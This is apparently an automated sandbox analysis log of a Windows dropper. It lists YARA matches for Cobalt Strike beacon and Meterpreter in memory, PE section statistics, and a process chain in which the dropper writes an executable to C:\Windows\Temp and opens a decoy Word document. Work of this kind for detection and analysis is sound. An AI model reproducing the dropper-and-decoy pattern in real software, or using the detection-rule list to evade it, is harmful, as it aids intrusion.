Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000003.00000002.706923007.000000C0002D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Beacon_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.705984762.000000C000174000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Beacon_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000003.00000002.706488711.000000C00023E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Beacon_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: Process Memory Space: ????????????.exe PID: 3016, type: MEMORYSTRMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: Process Memory Space: ????????????.exe PID: 3016, type: MEMORYSTRMatched rule: Cobaltbaltstrike_Beacon_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: Process Memory Space: ????????????.exe PID: 3016, type: MEMORYSTRMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: Process Memory Space: ????????????.exe PID: 3016, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_013189003_2_01318900
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_013121C03_2_013121C0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0131C9C03_2_0131C9C0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0130B8E03_2_0130B8E0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0130ACE03_2_0130ACE0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_01334F003_2_01334F00
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_01324F603_2_01324F60
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_01345B603_2_01345B60
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0131B3A03_2_0131B3A0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_013047803_2_01304780
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_01304BE03_2_01304BE0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0131B7E03_2_0131B7E0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_01315BE03_2_01315BE0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0131C2003_2_0131C200
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0132E6003_2_0132E600
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_013116653_2_01311665
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_013082403_2_01308240
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_013222403_2_01322240
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_01303EA03_2_01303EA0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0130A2C03_2_0130A2C0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_01324AC03_2_01324AC0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A88FE03_2_0000025BF8A88FE0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A747D03_2_0000025BF8A747D0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A7A0B43_2_0000025BF8A7A0B4
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A870603_2_0000025BF8A87060
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A861903_2_0000025BF8A86190
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A7B9E83_2_0000025BF8A7B9E8
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A879D03_2_0000025BF8A879D0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A6916C3_2_0000025BF8A6916C
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A801443_2_0000025BF8A80144
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A752C03_2_0000025BF8A752C0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A7C2CC3_2_0000025BF8A7C2CC
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A8533C3_2_0000025BF8A8533C
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A6EC303_2_0000025BF8A6EC30
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A7CC103_2_0000025BF8A7CC10
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A86D773_2_0000025BF8A86D77
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A696803_2_0000025BF8A69680
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A7AE743_2_0000025BF8A7AE74
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8ACACB43_2_0000025BF8ACACB4
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8ACD8103_2_0000025BF8ACD810
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8AC53D03_2_0000025BF8AC53D0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8AD7C603_2_0000025BF8AD7C60
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8ACC5E83_2_0000025BF8ACC5E8
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8AD85D03_2_0000025BF8AD85D0
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8ACCD543_2_0000025BF8ACCD54
Source: C:\Windows\Temp\????????????.exeCode function: String function: 01332C40 appears 247 times
Source: C:\Windows\Temp\????????????.exeCode function: String function: 01330BA0 appears 191 times
Source: C:\Windows\Temp\????????????.exeCode function: String function: 013323C0 appears 39 times
Source: C:\Windows\System32\cmd.exeSection loaded: sfc.dllJump to behavior
Source: 1a#U77e5.exeStatic PE information: Number of sections : 14 > 10
Source: ????????????.exe.0.drStatic PE information: Number of sections : 13 > 10
Source: 1a#U77e5.exeStatic PE information: Section: /19 ZLIB complexity 0.9987782579787234
Source: 1a#U77e5.exeStatic PE information: Section: /32 ZLIB complexity 0.9890455163043478
Source: 1a#U77e5.exeStatic PE information: Section: /65 ZLIB complexity 0.9983048349056604
Source: 1a#U77e5.exeStatic PE information: Section: /78 ZLIB complexity 0.9892698688271605
Source: ????????????.exe.0.drStatic PE information: Section: /19 ZLIB complexity 0.9949880125661376
Source: ????????????.exe.0.drStatic PE information: Section: /32 ZLIB complexity 0.9894425675675675
Source: ????????????.exe.0.drStatic PE information: Section: /65 ZLIB complexity 0.9975082694986073
Source: ????????????.exe.0.drStatic PE information: Section: /78 ZLIB complexity 0.9895907315340909
Source: 1a#U77e5.exeVirustotal: Detection: 61%
Source: 1a#U77e5.exeMetadefender: Detection: 22%
Source: 1a#U77e5.exeReversingLabs: Detection: 76%
Source: 1a#U77e5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1a#U77e5.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\1a#U77e5.exe "C:\Users\user\Desktop\1a#U77e5.exe"
Source: C:\Users\user\Desktop\1a#U77e5.exeProcess created: C:\Windows\Temp\????????????.exe C:\Windows\Temp\????????????.exe 9gb3vbgeng
Source: C:\Windows\Temp\????????????.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1a#U77e5.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start ?????????????????????.docx
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\?????????????????????.docx" /o "
Source: C:\Users\user\Desktop\1a#U77e5.exeProcess created: C:\Windows\Temp\????????????.exe C:\Windows\Temp\????????????.exe 9gb3vbgengJump to behavior
Source: C:\Users\user\Desktop\1a#U77e5.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start ?????????????????????.docxJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\?????????????????????.docx" /o "Jump to behavior
Source: C:\Windows\Temp\????????????.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: ?????????????????????.LNK.7.drLNK file: ..\..\..\..\..\Desktop\.docx
Source: C:\Users\user\Desktop\1a#U77e5.exeFile created: C:\Users\user\Desktop\?????????????????????.docxJump to behavior
Source: C:\Users\user\Desktop\1a#U77e5.exeFile created: C:\Windows\Temp\????????????.exeJump to behavior
Source: classification engineClassification label: mal100.troj.evad.winEXE@10/8@0/1
Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2164:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_01
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: 1a#U77e5.exeStatic file information: File size 4732928 > 1048576
Source: 1a#U77e5.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x33da00
Source: 1a#U77e5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8A920EC push 0000006Ah; retf 3_2_0000025BF8A92104
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8ABA71E push cs; retf 3_2_0000025BF8ABA71F
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8AD60DB push ebp; iretd 3_2_0000025BF8AD60DC
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8AD6124 push ebp; iretd 3_2_0000025BF8AD6125
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8AD60FB push ebp; iretd 3_2_0000025BF8AD60FC
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8ABA35D push edi; iretd 3_2_0000025BF8ABA35E
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8ABBD58 push ebp; iretd 3_2_0000025BF8ABBD59
Source: C:\Windows\Temp\????????????.exeCode function: 3_2_0000025BF8ADAE68 push ebp; iretd 3_2_0000025BF8ADAE6D
Source: 1a#U77e5.exeStatic PE information: section name: /4
Source: 1a#U77e5.exeStatic PE information: section name: /19
Source: 1a#U77e5.exeStatic PE information: section name: /32
Source: 1a#U77e5.exeStatic PE information: section name: /46
Source: 1a#U77e5.exeStatic PE information: section name: /65
Source: 1a#U77e5.exeStatic PE information: section name: /78
Source: 1a#U77e5.exeStatic PE information: section name: /90
Source: 1a#U77e5.exeStatic PE information: section name: .symtab
Source: ????????????.exe.0.drStatic PE information: section name: /4
Source: ????????????.exe.0.drStatic PE information: section name: /19
Source: ????????????.exe.0.drStatic PE information: section name: /32
Source: ????????????.exe.0.drStatic PE information: section name: /46
Source: ????????????.exe.0.drStatic PE information: section name: /65
Source: ????????????.exe.0.drStatic PE information: section name: /78
Source: ????????????.exe.0.drStatic PE information: section name: /90
Source: ????????????.exe.0.drStatic PE information: section name: .symtab
Source: C:\Users\user\Desktop\1a#U77e5.exeFile created: C:\Windows\Temp\????????????.exeJump to dropped file
Source: C:\Users\user\Desktop\1a#U77e5.exeFile created: C:\Windows\Temp\????????????.exeJump to dropped file
Source: C:\Users\user\Desktop\1a#U77e5.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\Desktop\1a#U77e5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\????????????.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\Temp\????????????.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
